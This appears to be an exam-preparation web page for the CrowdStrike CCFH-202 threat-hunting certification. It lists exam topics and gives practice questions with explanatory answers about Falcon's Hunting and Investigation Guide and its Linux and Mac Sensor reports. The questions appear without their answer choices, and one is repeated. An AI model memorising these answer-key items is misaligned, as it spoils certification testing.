Free Preparation Discussions
MENU
CrowdStrike CCFH-202 Exam
- Topic 1: Utilize the MITRE ATT&CK Framework to model threat actor behaviors/ Explain what information a bulk (Destination) IP search provides
- Topic 2: Explain what information a Mac Sensor Report will provide/ Conduct hypothesis and hunting lead generation to prove them out using Falcon tools
- Topic 3: Identify the vulnerability exploited from an initial attack vector/ Explain what information is in the Events Data Dictionary
- Topic 4: Explain what information a Hash Execution Search provides/ Explain what information a Bulk Domain Search provides
- Topic 5: Locate built-in Hunting reports and explain what they provide/ Identify alternative analytical interpretations to minimize and reduce false positives
- Topic 6: Explain what information is in the Hunting & Investigation Guide/ Differentiate testing, DevOps or general user activity from adversary behavior
- Topic 7: From the Statistics tab, use the left click filters to refine your search/ Explain what the ?join? command does and how it can be used to join disparate queries
- Topic 8: Convert and format Unix times to UTC-readable time/ Evaluate information for reliability, validity and relevance for use in the process of elimination
- Topic 9: Explain what information a Source IP Search provides/ Explain what the ?table? command does and demonstrate how it can be used for formatting output
- Topic 10: Demonstrate how to get a Process Timeline/ Analyze and recognize suspicious overt malicious behaviors
Free CrowdStrike CCFH-202 Exam Actual Questions
The questions for CCFH-202 were last updated On Apr. 23, 2024
Which of the following does the Hunting and Investigation Guide contain?
The Hunting and Investigation guide contains example Event Search queries useful for threat hunting. These queries are based on common threat hunting use cases and scenarios, such as finding suspicious processes, network connections, registry activity, etc. The guide also explains how to customize and modify the queries to suit different needs and environments. The guide does not contain a list of all event types and their syntax, as that information is provided in the Events Data Dictionary. The guide also does not contain example Event Search queries useful for Falcon platform configuration, as that is not the focus of the guide.
Where would an analyst find information about shells spawned by root, Kernel Module loads, and wget/curl usage?
The Linux Sensor report is where an analyst would find information about shells spawned by root, Kernel Module loads, and wget/curl usage. The Linux Sensor report is a pre-defined report that provides a summary view of selected activities on Linux hosts. It shows information such as process execution events, network connection events, file write events, etc. that occurred on Linux hosts within a specified time range. The Sensor Health report, the Sensor Policy Daily report, and the Mac Sensor report do not provide the same information.
Which of the following best describes the purpose of the Mac Sensor report?
This is the correct answer for the same reason as above. The Mac Sensor report provides a comprehensive view of activities occurring on Mac hosts, including items of interest that may be hunting or investigation leads. It does not display a listing of all Mac hosts with or without a Falcon sensor installed, nor does it provide a detection focused view of known malicious activities occurring on Mac hosts.
Which Falcon documentation guide should you reference to hunt for anomalies related to scheduled tasks and other Windows related artifacts?
The Hunting and Investigation guide is the Falcon documentation guide that you should reference to hunt for anomalies related to scheduled tasks and other Windows related artifacts. The Hunting and Investigation guide provides sample hunting queries, select walkthroughs, and best practices for hunting with Falcon. It covers various topics such as process execution, network connections, registry activity, scheduled tasks, and more.
Which of the following does the Hunting and Investigation Guide contain?
The Hunting and Investigation guide contains example Event Search queries useful for threat hunting. These queries are based on common threat hunting use cases and scenarios, such as finding suspicious processes, network connections, registry activity, etc. The guide also explains how to customize and modify the queries to suit different needs and environments. The guide does not contain a list of all event types and their syntax, as that information is provided in the Events Data Dictionary. The guide also does not contain example Event Search queries useful for Falcon platform configuration, as that is not the focus of the guide.
- Select Question Types you want
- Set your Desired Pass Percentage
- Allocate Time (Hours : Minutes)
- Create Multiple Practice tests with Limited Questions
- Customer Support
Currently there are no comments in this discussion, be the first to comment!